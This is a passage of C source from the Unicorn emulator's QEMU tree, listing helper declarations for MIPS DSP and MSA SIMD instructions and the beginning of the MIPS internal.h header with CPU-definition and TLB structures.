DEF_HELPER_FLAGS_2(cmpgu_le_qb, TCG_CALL_NO_RWG_SE, tl, tl, tl) DEF_HELPER_FLAGS_3(cmp_eq_ph, 0, void, tl, tl, env) DEF_HELPER_FLAGS_3(cmp_lt_ph, 0, void, tl, tl, env) DEF_HELPER_FLAGS_3(cmp_le_ph, 0, void, tl, tl, env) #if defined(TARGET_MIPS64) DEF_HELPER_FLAGS_3(cmpu_eq_ob, 0, void, tl, tl, env) DEF_HELPER_FLAGS_3(cmpu_lt_ob, 0, void, tl, tl, env) DEF_HELPER_FLAGS_3(cmpu_le_ob, 0, void, tl, tl, env) DEF_HELPER_FLAGS_3(cmpgdu_eq_ob, 0, tl, tl, tl, env) DEF_HELPER_FLAGS_3(cmpgdu_lt_ob, 0, tl, tl, tl, env) DEF_HELPER_FLAGS_3(cmpgdu_le_ob, 0, tl, tl, tl, env) DEF_HELPER_FLAGS_2(cmpgu_eq_ob, TCG_CALL_NO_RWG_SE, tl, tl, tl) DEF_HELPER_FLAGS_2(cmpgu_lt_ob, TCG_CALL_NO_RWG_SE, tl, tl, tl) DEF_HELPER_FLAGS_2(cmpgu_le_ob, TCG_CALL_NO_RWG_SE, tl, tl, tl) DEF_HELPER_FLAGS_3(cmp_eq_qh, 0, void, tl, tl, env) DEF_HELPER_FLAGS_3(cmp_lt_qh, 0, void, tl, tl, env) DEF_HELPER_FLAGS_3(cmp_le_qh, 0, void, tl, tl, env) DEF_HELPER_FLAGS_3(cmp_eq_pw, 0, void, tl, tl, env) DEF_HELPER_FLAGS_3(cmp_lt_pw, 0, void, tl, tl, env) DEF_HELPER_FLAGS_3(cmp_le_pw, 0, void, tl, tl, env) #endif DEF_HELPER_FLAGS_3(pick_qb, 0, tl, tl, tl, env) DEF_HELPER_FLAGS_3(pick_ph, 0, tl, tl, tl, env) #if defined(TARGET_MIPS64) DEF_HELPER_FLAGS_3(pick_ob, 0, tl, tl, tl, env) DEF_HELPER_FLAGS_3(pick_qh, 0, tl, tl, tl, env) DEF_HELPER_FLAGS_3(pick_pw, 0, tl, tl, tl, env) #endif DEF_HELPER_FLAGS_2(packrl_ph, TCG_CALL_NO_RWG_SE, tl, tl, tl) #if defined(TARGET_MIPS64) DEF_HELPER_FLAGS_2(packrl_pw, TCG_CALL_NO_RWG_SE, tl, tl, tl) #endif /* DSP Accumulator and DSPControl Access Sub-class insns */ DEF_HELPER_FLAGS_3(extr_w, 0, tl, tl, tl, env) DEF_HELPER_FLAGS_3(extr_r_w, 0, tl, tl, tl, env) DEF_HELPER_FLAGS_3(extr_rs_w, 0, tl, tl, tl, env) #if defined(TARGET_MIPS64) DEF_HELPER_FLAGS_3(dextr_w, 0, tl, tl, tl, env) DEF_HELPER_FLAGS_3(dextr_r_w, 0, tl, tl, tl, env) DEF_HELPER_FLAGS_3(dextr_rs_w, 0, tl, tl, tl, env) DEF_HELPER_FLAGS_3(dextr_l, 0, tl, tl, tl, env) DEF_HELPER_FLAGS_3(dextr_r_l, 0, tl, tl, tl, env) DEF_HELPER_FLAGS_3(dextr_rs_l, 0, tl, tl, tl, env) #endif DEF_HELPER_FLAGS_3(extr_s_h, 0, tl, tl, tl, env) #if defined(TARGET_MIPS64) DEF_HELPER_FLAGS_3(dextr_s_h, 0, tl, tl, tl, env) #endif DEF_HELPER_FLAGS_3(extp, 0, tl, tl, tl, env) DEF_HELPER_FLAGS_3(extpdp, 0, tl, tl, tl, env) #if defined(TARGET_MIPS64) DEF_HELPER_FLAGS_3(dextp, 0, tl, tl, tl, env) DEF_HELPER_FLAGS_3(dextpdp, 0, tl, tl, tl, env) #endif DEF_HELPER_FLAGS_3(shilo, 0, void, tl, tl, env) #if defined(TARGET_MIPS64) DEF_HELPER_FLAGS_3(dshilo, 0, void, tl, tl, env) #endif DEF_HELPER_FLAGS_3(mthlip, 0, void, tl, tl, env) #if defined(TARGET_MIPS64) DEF_HELPER_FLAGS_3(dmthlip, 0, void, tl, tl, env) #endif DEF_HELPER_FLAGS_3(wrdsp, 0, void, tl, tl, env) 
DEF_HELPER_FLAGS_2(rddsp, 0, tl, tl, env) /* MIPS SIMD Architecture */ DEF_HELPER_3(msa_nloc_b, void, env, i32, i32) DEF_HELPER_3(msa_nloc_h, void, env, i32, i32) DEF_HELPER_3(msa_nloc_w, void, env, i32, i32) DEF_HELPER_3(msa_nloc_d, void, env, i32, i32) DEF_HELPER_3(msa_nlzc_b, void, env, i32, i32) DEF_HELPER_3(msa_nlzc_h, void, env, i32, i32) DEF_HELPER_3(msa_nlzc_w, void, env, i32, i32) DEF_HELPER_3(msa_nlzc_d, void, env, i32, i32) DEF_HELPER_3(msa_pcnt_b, void, env, i32, i32) DEF_HELPER_3(msa_pcnt_h, void, env, i32, i32) DEF_HELPER_3(msa_pcnt_w, void, env, i32, i32) DEF_HELPER_3(msa_pcnt_d, void, env, i32, i32) DEF_HELPER_4(msa_binsl_b, void, env, i32, i32, i32) DEF_HELPER_4(msa_binsl_h, void, env, i32, i32, i32) DEF_HELPER_4(msa_binsl_w, void, env, i32, i32, i32) DEF_HELPER_4(msa_binsl_d, void, env, i32, i32, i32) DEF_HELPER_4(msa_binsr_b, void, env, i32, i32, i32) DEF_HELPER_4(msa_binsr_h, void, env, i32, i32, i32) DEF_HELPER_4(msa_binsr_w, void, env, i32, i32, i32) DEF_HELPER_4(msa_binsr_d, void, env, i32, i32, i32) DEF_HELPER_4(msa_bmnz_v, void, env, i32, i32, i32) DEF_HELPER_4(msa_bmz_v, void, env, i32, i32, i32) DEF_HELPER_4(msa_bsel_v, void, env, i32, i32, i32) DEF_HELPER_4(msa_bclr_b, void, env, i32, i32, i32) DEF_HELPER_4(msa_bclr_h, void, env, i32, i32, i32) DEF_HELPER_4(msa_bclr_w, void, env, i32, i32, i32) DEF_HELPER_4(msa_bclr_d, void, env, i32, i32, i32) DEF_HELPER_4(msa_bneg_b, void, env, i32, i32, i32) DEF_HELPER_4(msa_bneg_h, void, env, i32, i32, i32) DEF_HELPER_4(msa_bneg_w, void, env, i32, i32, i32) DEF_HELPER_4(msa_bneg_d, void, env, i32, i32, i32) DEF_HELPER_4(msa_bset_b, void, env, i32, i32, i32) DEF_HELPER_4(msa_bset_h, void, env, i32, i32, i32) DEF_HELPER_4(msa_bset_w, void, env, i32, i32, i32) DEF_HELPER_4(msa_bset_d, void, env, i32, i32, i32) DEF_HELPER_4(msa_add_a_b, void, env, i32, i32, i32) DEF_HELPER_4(msa_add_a_h, void, env, i32, i32, i32) DEF_HELPER_4(msa_add_a_w, void, env, i32, i32, i32) DEF_HELPER_4(msa_add_a_d, void, env, i32, i32, i32) DEF_HELPER_4(msa_adds_a_b, void, env, i32, i32, i32) DEF_HELPER_4(msa_adds_a_h, void, env, i32, i32, i32) DEF_HELPER_4(msa_adds_a_w, void, env, i32, i32, i32) DEF_HELPER_4(msa_adds_a_d, void, env, i32, i32, i32) DEF_HELPER_4(msa_adds_s_b, void, env, i32, i32, i32) DEF_HELPER_4(msa_adds_s_h, void, env, i32, i32, i32) DEF_HELPER_4(msa_adds_s_w, void, env, i32, i32, i32) DEF_HELPER_4(msa_adds_s_d, void, env, i32, i32, i32) DEF_HELPER_4(msa_adds_u_b, void, env, i32, i32, i32) DEF_HELPER_4(msa_adds_u_h, void, env, i32, i32, i32) DEF_HELPER_4(msa_adds_u_w, void, env, i32, i32, i32) DEF_HELPER_4(msa_adds_u_d, void, env, i32, i32, i32) DEF_HELPER_4(msa_addv_b, void, env, i32, i32, i32) DEF_HELPER_4(msa_addv_h, void, env, i32, i32, i32) DEF_HELPER_4(msa_addv_w, void, env, i32, i32, i32) DEF_HELPER_4(msa_addv_d, void, env, i32, i32, i32) DEF_HELPER_4(msa_hadd_s_h, void, env, i32, i32, i32) DEF_HELPER_4(msa_hadd_s_w, void, env, i32, i32, i32) DEF_HELPER_4(msa_hadd_s_d, void, env, i32, i32, i32) DEF_HELPER_4(msa_hadd_u_h, void, env, i32, i32, i32) DEF_HELPER_4(msa_hadd_u_w, void, env, i32, i32, i32) DEF_HELPER_4(msa_hadd_u_d, void, env, i32, i32, i32) DEF_HELPER_4(msa_ave_s_b, void, env, i32, i32, i32) DEF_HELPER_4(msa_ave_s_h, void, env, i32, i32, i32) DEF_HELPER_4(msa_ave_s_w, void, env, i32, i32, i32) DEF_HELPER_4(msa_ave_s_d, void, env, i32, i32, i32) DEF_HELPER_4(msa_ave_u_b, void, env, i32, i32, i32) DEF_HELPER_4(msa_ave_u_h, void, env, i32, i32, i32) DEF_HELPER_4(msa_ave_u_w, void, env, i32, i32, i32) 
DEF_HELPER_4(msa_ave_u_d, void, env, i32, i32, i32) DEF_HELPER_4(msa_aver_s_b, void, env, i32, i32, i32) DEF_HELPER_4(msa_aver_s_h, void, env, i32, i32, i32) DEF_HELPER_4(msa_aver_s_w, void, env, i32, i32, i32) DEF_HELPER_4(msa_aver_s_d, void, env, i32, i32, i32) DEF_HELPER_4(msa_aver_u_b, void, env, i32, i32, i32) DEF_HELPER_4(msa_aver_u_h, void, env, i32, i32, i32) DEF_HELPER_4(msa_aver_u_w, void, env, i32, i32, i32) DEF_HELPER_4(msa_aver_u_d, void, env, i32, i32, i32) DEF_HELPER_4(msa_ceq_b, void, env, i32, i32, i32) DEF_HELPER_4(msa_ceq_h, void, env, i32, i32, i32) DEF_HELPER_4(msa_ceq_w, void, env, i32, i32, i32) DEF_HELPER_4(msa_ceq_d, void, env, i32, i32, i32) DEF_HELPER_4(msa_cle_s_b, void, env, i32, i32, i32) DEF_HELPER_4(msa_cle_s_h, void, env, i32, i32, i32) DEF_HELPER_4(msa_cle_s_w, void, env, i32, i32, i32) DEF_HELPER_4(msa_cle_s_d, void, env, i32, i32, i32) DEF_HELPER_4(msa_cle_u_b, void, env, i32, i32, i32) DEF_HELPER_4(msa_cle_u_h, void, env, i32, i32, i32) DEF_HELPER_4(msa_cle_u_w, void, env, i32, i32, i32) DEF_HELPER_4(msa_cle_u_d, void, env, i32, i32, i32) DEF_HELPER_4(msa_clt_s_b, void, env, i32, i32, i32) DEF_HELPER_4(msa_clt_s_h, void, env, i32, i32, i32) DEF_HELPER_4(msa_clt_s_w, void, env, i32, i32, i32) DEF_HELPER_4(msa_clt_s_d, void, env, i32, i32, i32) DEF_HELPER_4(msa_clt_u_b, void, env, i32, i32, i32) DEF_HELPER_4(msa_clt_u_h, void, env, i32, i32, i32) DEF_HELPER_4(msa_clt_u_w, void, env, i32, i32, i32) DEF_HELPER_4(msa_clt_u_d, void, env, i32, i32, i32) DEF_HELPER_4(msa_div_s_b, void, env, i32, i32, i32) DEF_HELPER_4(msa_div_s_h, void, env, i32, i32, i32) DEF_HELPER_4(msa_div_s_w, void, env, i32, i32, i32) DEF_HELPER_4(msa_div_s_d, void, env, i32, i32, i32) DEF_HELPER_4(msa_div_u_b, void, env, i32, i32, i32) DEF_HELPER_4(msa_div_u_h, void, env, i32, i32, i32) DEF_HELPER_4(msa_div_u_w, void, env, i32, i32, i32) DEF_HELPER_4(msa_div_u_d, void, env, i32, i32, i32) DEF_HELPER_4(msa_max_a_b, void, env, i32, i32, i32) DEF_HELPER_4(msa_max_a_h, void, env, i32, i32, i32) DEF_HELPER_4(msa_max_a_w, void, env, i32, i32, i32) DEF_HELPER_4(msa_max_a_d, void, env, i32, i32, i32) DEF_HELPER_4(msa_max_s_b, void, env, i32, i32, i32) DEF_HELPER_4(msa_max_s_h, void, env, i32, i32, i32) DEF_HELPER_4(msa_max_s_w, void, env, i32, i32, i32) DEF_HELPER_4(msa_max_s_d, void, env, i32, i32, i32) DEF_HELPER_4(msa_max_u_b, void, env, i32, i32, i32) DEF_HELPER_4(msa_max_u_h, void, env, i32, i32, i32) DEF_HELPER_4(msa_max_u_w, void, env, i32, i32, i32) DEF_HELPER_4(msa_max_u_d, void, env, i32, i32, i32) DEF_HELPER_4(msa_min_a_b, void, env, i32, i32, i32) DEF_HELPER_4(msa_min_a_h, void, env, i32, i32, i32) DEF_HELPER_4(msa_min_a_w, void, env, i32, i32, i32) DEF_HELPER_4(msa_min_a_d, void, env, i32, i32, i32) DEF_HELPER_4(msa_min_s_b, void, env, i32, i32, i32) DEF_HELPER_4(msa_min_s_h, void, env, i32, i32, i32) DEF_HELPER_4(msa_min_s_w, void, env, i32, i32, i32) DEF_HELPER_4(msa_min_s_d, void, env, i32, i32, i32) DEF_HELPER_4(msa_min_u_b, void, env, i32, i32, i32) DEF_HELPER_4(msa_min_u_h, void, env, i32, i32, i32) DEF_HELPER_4(msa_min_u_w, void, env, i32, i32, i32) DEF_HELPER_4(msa_min_u_d, void, env, i32, i32, i32) DEF_HELPER_4(msa_mod_u_b, void, env, i32, i32, i32) DEF_HELPER_4(msa_mod_u_h, void, env, i32, i32, i32) DEF_HELPER_4(msa_mod_u_w, void, env, i32, i32, i32) DEF_HELPER_4(msa_mod_u_d, void, env, i32, i32, i32) DEF_HELPER_4(msa_mod_s_b, void, env, i32, i32, i32) DEF_HELPER_4(msa_mod_s_h, void, env, i32, i32, i32) DEF_HELPER_4(msa_mod_s_w, void, env, i32, i32, i32) 
DEF_HELPER_4(msa_mod_s_d, void, env, i32, i32, i32) DEF_HELPER_4(msa_asub_s_b, void, env, i32, i32, i32) DEF_HELPER_4(msa_asub_s_h, void, env, i32, i32, i32) DEF_HELPER_4(msa_asub_s_w, void, env, i32, i32, i32) DEF_HELPER_4(msa_asub_s_d, void, env, i32, i32, i32) DEF_HELPER_4(msa_asub_u_b, void, env, i32, i32, i32) DEF_HELPER_4(msa_asub_u_h, void, env, i32, i32, i32) DEF_HELPER_4(msa_asub_u_w, void, env, i32, i32, i32) DEF_HELPER_4(msa_asub_u_d, void, env, i32, i32, i32) DEF_HELPER_4(msa_hsub_s_h, void, env, i32, i32, i32) DEF_HELPER_4(msa_hsub_s_w, void, env, i32, i32, i32) DEF_HELPER_4(msa_hsub_s_d, void, env, i32, i32, i32) DEF_HELPER_4(msa_hsub_u_h, void, env, i32, i32, i32) DEF_HELPER_4(msa_hsub_u_w, void, env, i32, i32, i32) DEF_HELPER_4(msa_hsub_u_d, void, env, i32, i32, i32) DEF_HELPER_4(msa_ilvev_b, void, env, i32, i32, i32) DEF_HELPER_4(msa_ilvev_h, void, env, i32, i32, i32) DEF_HELPER_4(msa_ilvev_w, void, env, i32, i32, i32) DEF_HELPER_4(msa_ilvev_d, void, env, i32, i32, i32) DEF_HELPER_4(msa_ilvod_b, void, env, i32, i32, i32) DEF_HELPER_4(msa_ilvod_h, void, env, i32, i32, i32) DEF_HELPER_4(msa_ilvod_w, void, env, i32, i32, i32) DEF_HELPER_4(msa_ilvod_d, void, env, i32, i32, i32) DEF_HELPER_4(msa_ilvl_b, void, env, i32, i32, i32) DEF_HELPER_4(msa_ilvl_h, void, env, i32, i32, i32) DEF_HELPER_4(msa_ilvl_w, void, env, i32, i32, i32) DEF_HELPER_4(msa_ilvl_d, void, env, i32, i32, i32) DEF_HELPER_4(msa_ilvr_b, void, env, i32, i32, i32) DEF_HELPER_4(msa_ilvr_h, void, env, i32, i32, i32) DEF_HELPER_4(msa_ilvr_w, void, env, i32, i32, i32) DEF_HELPER_4(msa_ilvr_d, void, env, i32, i32, i32) DEF_HELPER_4(msa_and_v, void, env, i32, i32, i32) DEF_HELPER_4(msa_nor_v, void, env, i32, i32, i32) DEF_HELPER_4(msa_or_v, void, env, i32, i32, i32) DEF_HELPER_4(msa_xor_v, void, env, i32, i32, i32) DEF_HELPER_4(msa_pckev_b, void, env, i32, i32, i32) DEF_HELPER_4(msa_pckev_h, void, env, i32, i32, i32) DEF_HELPER_4(msa_pckev_w, void, env, i32, i32, i32) DEF_HELPER_4(msa_pckev_d, void, env, i32, i32, i32) DEF_HELPER_4(msa_pckod_b, void, env, i32, i32, i32) DEF_HELPER_4(msa_pckod_h, void, env, i32, i32, i32) DEF_HELPER_4(msa_pckod_w, void, env, i32, i32, i32) DEF_HELPER_4(msa_pckod_d, void, env, i32, i32, i32) DEF_HELPER_4(msa_sll_b, void, env, i32, i32, i32) DEF_HELPER_4(msa_sll_h, void, env, i32, i32, i32) DEF_HELPER_4(msa_sll_w, void, env, i32, i32, i32) DEF_HELPER_4(msa_sll_d, void, env, i32, i32, i32) DEF_HELPER_4(msa_sra_b, void, env, i32, i32, i32) DEF_HELPER_4(msa_sra_h, void, env, i32, i32, i32) DEF_HELPER_4(msa_sra_w, void, env, i32, i32, i32) DEF_HELPER_4(msa_sra_d, void, env, i32, i32, i32) DEF_HELPER_4(msa_srar_b, void, env, i32, i32, i32) DEF_HELPER_4(msa_srar_h, void, env, i32, i32, i32) DEF_HELPER_4(msa_srar_w, void, env, i32, i32, i32) DEF_HELPER_4(msa_srar_d, void, env, i32, i32, i32) DEF_HELPER_4(msa_srl_b, void, env, i32, i32, i32) DEF_HELPER_4(msa_srl_h, void, env, i32, i32, i32) DEF_HELPER_4(msa_srl_w, void, env, i32, i32, i32) DEF_HELPER_4(msa_srl_d, void, env, i32, i32, i32) DEF_HELPER_4(msa_srlr_b, void, env, i32, i32, i32) DEF_HELPER_4(msa_srlr_h, void, env, i32, i32, i32) DEF_HELPER_4(msa_srlr_w, void, env, i32, i32, i32) DEF_HELPER_4(msa_srlr_d, void, env, i32, i32, i32) DEF_HELPER_3(msa_move_v, void, env, i32, i32) DEF_HELPER_4(msa_andi_b, void, env, i32, i32, i32) DEF_HELPER_4(msa_ori_b, void, env, i32, i32, i32) DEF_HELPER_4(msa_nori_b, void, env, i32, i32, i32) DEF_HELPER_4(msa_xori_b, void, env, i32, i32, i32) DEF_HELPER_4(msa_bmnzi_b, void, env, i32, i32, i32) 
DEF_HELPER_4(msa_bmzi_b, void, env, i32, i32, i32) DEF_HELPER_4(msa_bseli_b, void, env, i32, i32, i32) DEF_HELPER_5(msa_shf_df, void, env, i32, i32, i32, i32) DEF_HELPER_5(msa_addvi_df, void, env, i32, i32, i32, s32) DEF_HELPER_5(msa_subvi_df, void, env, i32, i32, i32, s32) DEF_HELPER_5(msa_maxi_s_df, void, env, i32, i32, i32, s32) DEF_HELPER_5(msa_maxi_u_df, void, env, i32, i32, i32, s32) DEF_HELPER_5(msa_mini_s_df, void, env, i32, i32, i32, s32) DEF_HELPER_5(msa_mini_u_df, void, env, i32, i32, i32, s32) DEF_HELPER_5(msa_ceqi_df, void, env, i32, i32, i32, s32) DEF_HELPER_5(msa_clti_s_df, void, env, i32, i32, i32, s32) DEF_HELPER_5(msa_clti_u_df, void, env, i32, i32, i32, s32) DEF_HELPER_5(msa_clei_s_df, void, env, i32, i32, i32, s32) DEF_HELPER_5(msa_clei_u_df, void, env, i32, i32, i32, s32) DEF_HELPER_4(msa_ldi_df, void, env, i32, i32, s32) DEF_HELPER_5(msa_slli_df, void, env, i32, i32, i32, i32) DEF_HELPER_5(msa_srai_df, void, env, i32, i32, i32, i32) DEF_HELPER_5(msa_srli_df, void, env, i32, i32, i32, i32) DEF_HELPER_5(msa_bclri_df, void, env, i32, i32, i32, i32) DEF_HELPER_5(msa_bseti_df, void, env, i32, i32, i32, i32) DEF_HELPER_5(msa_bnegi_df, void, env, i32, i32, i32, i32) DEF_HELPER_5(msa_binsli_df, void, env, i32, i32, i32, i32) DEF_HELPER_5(msa_binsri_df, void, env, i32, i32, i32, i32) DEF_HELPER_5(msa_sat_s_df, void, env, i32, i32, i32, i32) DEF_HELPER_5(msa_sat_u_df, void, env, i32, i32, i32, i32) DEF_HELPER_5(msa_srari_df, void, env, i32, i32, i32, i32) DEF_HELPER_5(msa_srlri_df, void, env, i32, i32, i32, i32) DEF_HELPER_5(msa_binsl_df, void, env, i32, i32, i32, i32) DEF_HELPER_5(msa_binsr_df, void, env, i32, i32, i32, i32) DEF_HELPER_5(msa_subv_df, void, env, i32, i32, i32, i32) DEF_HELPER_5(msa_subs_s_df, void, env, i32, i32, i32, i32) DEF_HELPER_5(msa_subs_u_df, void, env, i32, i32, i32, i32) DEF_HELPER_5(msa_subsus_u_df, void, env, i32, i32, i32, i32) DEF_HELPER_5(msa_subsuu_s_df, void, env, i32, i32, i32, i32) DEF_HELPER_5(msa_mulv_df, void, env, i32, i32, i32, i32) DEF_HELPER_5(msa_maddv_df, void, env, i32, i32, i32, i32) DEF_HELPER_5(msa_msubv_df, void, env, i32, i32, i32, i32) DEF_HELPER_5(msa_dotp_s_df, void, env, i32, i32, i32, i32) DEF_HELPER_5(msa_dotp_u_df, void, env, i32, i32, i32, i32) DEF_HELPER_5(msa_dpadd_s_df, void, env, i32, i32, i32, i32) DEF_HELPER_5(msa_dpadd_u_df, void, env, i32, i32, i32, i32) DEF_HELPER_5(msa_dpsub_s_df, void, env, i32, i32, i32, i32) DEF_HELPER_5(msa_dpsub_u_df, void, env, i32, i32, i32, i32) DEF_HELPER_5(msa_sld_df, void, env, i32, i32, i32, i32) DEF_HELPER_5(msa_splat_df, void, env, i32, i32, i32, i32) DEF_HELPER_5(msa_vshf_df, void, env, i32, i32, i32, i32) DEF_HELPER_5(msa_sldi_df, void, env, i32, i32, i32, i32) DEF_HELPER_5(msa_splati_df, void, env, i32, i32, i32, i32) DEF_HELPER_5(msa_insve_df, void, env, i32, i32, i32, i32) DEF_HELPER_3(msa_ctcmsa, void, env, tl, i32) DEF_HELPER_2(msa_cfcmsa, tl, env, i32) DEF_HELPER_5(msa_fcaf_df, void, env, i32, i32, i32, i32) DEF_HELPER_5(msa_fcun_df, void, env, i32, i32, i32, i32) DEF_HELPER_5(msa_fceq_df, void, env, i32, i32, i32, i32) DEF_HELPER_5(msa_fcueq_df, void, env, i32, i32, i32, i32) DEF_HELPER_5(msa_fclt_df, void, env, i32, i32, i32, i32) DEF_HELPER_5(msa_fcult_df, void, env, i32, i32, i32, i32) DEF_HELPER_5(msa_fcle_df, void, env, i32, i32, i32, i32) DEF_HELPER_5(msa_fcule_df, void, env, i32, i32, i32, i32) DEF_HELPER_5(msa_fsaf_df, void, env, i32, i32, i32, i32) DEF_HELPER_5(msa_fsun_df, void, env, i32, i32, i32, i32) DEF_HELPER_5(msa_fseq_df, void, env, i32, i32, i32, i32) 
DEF_HELPER_5(msa_fsueq_df, void, env, i32, i32, i32, i32) DEF_HELPER_5(msa_fslt_df, void, env, i32, i32, i32, i32) DEF_HELPER_5(msa_fsult_df, void, env, i32, i32, i32, i32) DEF_HELPER_5(msa_fsle_df, void, env, i32, i32, i32, i32) DEF_HELPER_5(msa_fsule_df, void, env, i32, i32, i32, i32) DEF_HELPER_5(msa_fadd_df, void, env, i32, i32, i32, i32) DEF_HELPER_5(msa_fsub_df, void, env, i32, i32, i32, i32) DEF_HELPER_5(msa_fmul_df, void, env, i32, i32, i32, i32) DEF_HELPER_5(msa_fdiv_df, void, env, i32, i32, i32, i32) DEF_HELPER_5(msa_fmadd_df, void, env, i32, i32, i32, i32) DEF_HELPER_5(msa_fmsub_df, void, env, i32, i32, i32, i32) DEF_HELPER_5(msa_fexp2_df, void, env, i32, i32, i32, i32) DEF_HELPER_5(msa_fexdo_df, void, env, i32, i32, i32, i32) DEF_HELPER_5(msa_ftq_df, void, env, i32, i32, i32, i32) DEF_HELPER_5(msa_fmin_df, void, env, i32, i32, i32, i32) DEF_HELPER_5(msa_fmin_a_df, void, env, i32, i32, i32, i32) DEF_HELPER_5(msa_fmax_df, void, env, i32, i32, i32, i32) DEF_HELPER_5(msa_fmax_a_df, void, env, i32, i32, i32, i32) DEF_HELPER_5(msa_fcor_df, void, env, i32, i32, i32, i32) DEF_HELPER_5(msa_fcune_df, void, env, i32, i32, i32, i32) DEF_HELPER_5(msa_fcne_df, void, env, i32, i32, i32, i32) DEF_HELPER_5(msa_mul_q_df, void, env, i32, i32, i32, i32) DEF_HELPER_5(msa_madd_q_df, void, env, i32, i32, i32, i32) DEF_HELPER_5(msa_msub_q_df, void, env, i32, i32, i32, i32) DEF_HELPER_5(msa_fsor_df, void, env, i32, i32, i32, i32) DEF_HELPER_5(msa_fsune_df, void, env, i32, i32, i32, i32) DEF_HELPER_5(msa_fsne_df, void, env, i32, i32, i32, i32) DEF_HELPER_5(msa_mulr_q_df, void, env, i32, i32, i32, i32) DEF_HELPER_5(msa_maddr_q_df, void, env, i32, i32, i32, i32) DEF_HELPER_5(msa_msubr_q_df, void, env, i32, i32, i32, i32) DEF_HELPER_4(msa_fill_df, void, env, i32, i32, i32) DEF_HELPER_4(msa_copy_s_b, void, env, i32, i32, i32) DEF_HELPER_4(msa_copy_s_h, void, env, i32, i32, i32) DEF_HELPER_4(msa_copy_s_w, void, env, i32, i32, i32) DEF_HELPER_4(msa_copy_s_d, void, env, i32, i32, i32) DEF_HELPER_4(msa_copy_u_b, void, env, i32, i32, i32) DEF_HELPER_4(msa_copy_u_h, void, env, i32, i32, i32) DEF_HELPER_4(msa_copy_u_w, void, env, i32, i32, i32) DEF_HELPER_4(msa_insert_b, void, env, i32, i32, i32) DEF_HELPER_4(msa_insert_h, void, env, i32, i32, i32) DEF_HELPER_4(msa_insert_w, void, env, i32, i32, i32) DEF_HELPER_4(msa_insert_d, void, env, i32, i32, i32) DEF_HELPER_4(msa_fclass_df, void, env, i32, i32, i32) DEF_HELPER_4(msa_ftrunc_s_df, void, env, i32, i32, i32) DEF_HELPER_4(msa_ftrunc_u_df, void, env, i32, i32, i32) DEF_HELPER_4(msa_fsqrt_df, void, env, i32, i32, i32) DEF_HELPER_4(msa_frsqrt_df, void, env, i32, i32, i32) DEF_HELPER_4(msa_frcp_df, void, env, i32, i32, i32) DEF_HELPER_4(msa_frint_df, void, env, i32, i32, i32) DEF_HELPER_4(msa_flog2_df, void, env, i32, i32, i32) DEF_HELPER_4(msa_fexupl_df, void, env, i32, i32, i32) DEF_HELPER_4(msa_fexupr_df, void, env, i32, i32, i32) DEF_HELPER_4(msa_ffql_df, void, env, i32, i32, i32) DEF_HELPER_4(msa_ffqr_df, void, env, i32, i32, i32) DEF_HELPER_4(msa_ftint_s_df, void, env, i32, i32, i32) DEF_HELPER_4(msa_ftint_u_df, void, env, i32, i32, i32) DEF_HELPER_4(msa_ffint_s_df, void, env, i32, i32, i32) DEF_HELPER_4(msa_ffint_u_df, void, env, i32, i32, i32) #define MSALDST_PROTO(type) \ DEF_HELPER_3(msa_ld_ ## type, void, env, i32, tl) \ DEF_HELPER_3(msa_st_ ## type, void, env, i32, tl) MSALDST_PROTO(b) MSALDST_PROTO(h) MSALDST_PROTO(w) MSALDST_PROTO(d) #undef MSALDST_PROTO DEF_HELPER_3(cache, void, env, tl, i32) 
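/*
 * For reference, MSALDST_PROTO(b) above pastes its argument into the
 * helper names, i.e. it expands to:
 *
 *     DEF_HELPER_3(msa_ld_b, void, env, i32, tl)
 *     DEF_HELPER_3(msa_st_b, void, env, i32, tl)
 *
 * and likewise for the h/w/d element sizes.
 */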
unicorn-2.1.1/qemu/target/mips/internal.h000066400000000000000000000034533146752410670020406 0ustar00rootroot00000000000000/* * MIPS internal definitions and helpers * * This work is licensed under the terms of the GNU GPL, version 2 or later. * See the COPYING file in the top-level directory. */ #ifndef MIPS_INTERNAL_H #define MIPS_INTERNAL_H #include "fpu/softfloat-helpers.h" #include "cpu.h" struct uc_struct; /* * MMU types, the first four entries have the same layout as the * CP0C0_MT field. */ enum mips_mmu_types { MMU_TYPE_NONE, MMU_TYPE_R4000, MMU_TYPE_RESERVED, MMU_TYPE_FMT, MMU_TYPE_R3000, MMU_TYPE_R6000, MMU_TYPE_R8000 }; struct mips_def_t { const char *name; int32_t CP0_PRid; int32_t CP0_Config0; int32_t CP0_Config1; int32_t CP0_Config2; int32_t CP0_Config3; int32_t CP0_Config4; int32_t CP0_Config4_rw_bitmask; int32_t CP0_Config5; int32_t CP0_Config5_rw_bitmask; int32_t CP0_Config6; int32_t CP0_Config7; target_ulong CP0_LLAddr_rw_bitmask; int CP0_LLAddr_shift; int32_t SYNCI_Step; int32_t CCRes; int32_t CP0_Status_rw_bitmask; int32_t CP0_TCStatus_rw_bitmask; int32_t CP0_SRSCtl; int32_t CP1_fcr0; int32_t CP1_fcr31_rw_bitmask; int32_t CP1_fcr31; int32_t MSAIR; int32_t SEGBITS; int32_t PABITS; int32_t CP0_SRSConf0_rw_bitmask; int32_t CP0_SRSConf0; int32_t CP0_SRSConf1_rw_bitmask; int32_t CP0_SRSConf1; int32_t CP0_SRSConf2_rw_bitmask; int32_t CP0_SRSConf2; int32_t CP0_SRSConf3_rw_bitmask; int32_t CP0_SRSConf3; int32_t CP0_SRSConf4_rw_bitmask; int32_t CP0_SRSConf4; int32_t CP0_PageGrain_rw_bitmask; int32_t CP0_PageGrain; target_ulong CP0_EBaseWG_rw_bitmask; uint64_t insn_flags; enum mips_mmu_types mmu_type; int32_t SAARP; }; extern const struct mips_def_t mips_defs[]; extern const int mips_defs_number; enum CPUMIPSMSADataFormat { DF_BYTE = 0, DF_HALF, DF_WORD, DF_DOUBLE }; void mips_cpu_do_interrupt(CPUState *cpu); bool mips_cpu_exec_interrupt(CPUState *cpu, int int_req); hwaddr mips_cpu_get_phys_page_debug(CPUState *cpu, vaddr addr); void mips_cpu_do_unaligned_access(CPUState *cpu, vaddr addr, MMUAccessType access_type, int mmu_idx, uintptr_t retaddr); typedef struct r4k_tlb_t r4k_tlb_t; struct r4k_tlb_t { target_ulong VPN; uint32_t PageMask; uint16_t ASID; uint32_t MMID; unsigned int G:1; unsigned int C0:3; unsigned int C1:3; unsigned int V0:1; unsigned int V1:1; unsigned int D0:1; unsigned int D1:1; unsigned int XI0:1; unsigned int XI1:1; unsigned int RI0:1; unsigned int RI1:1; unsigned int EHINV:1; uint64_t PFN[2]; }; struct CPUMIPSTLBContext { uint32_t nb_tlb; uint32_t tlb_in_use; int (*map_address)(struct CPUMIPSState *env, hwaddr *physical, int *prot, 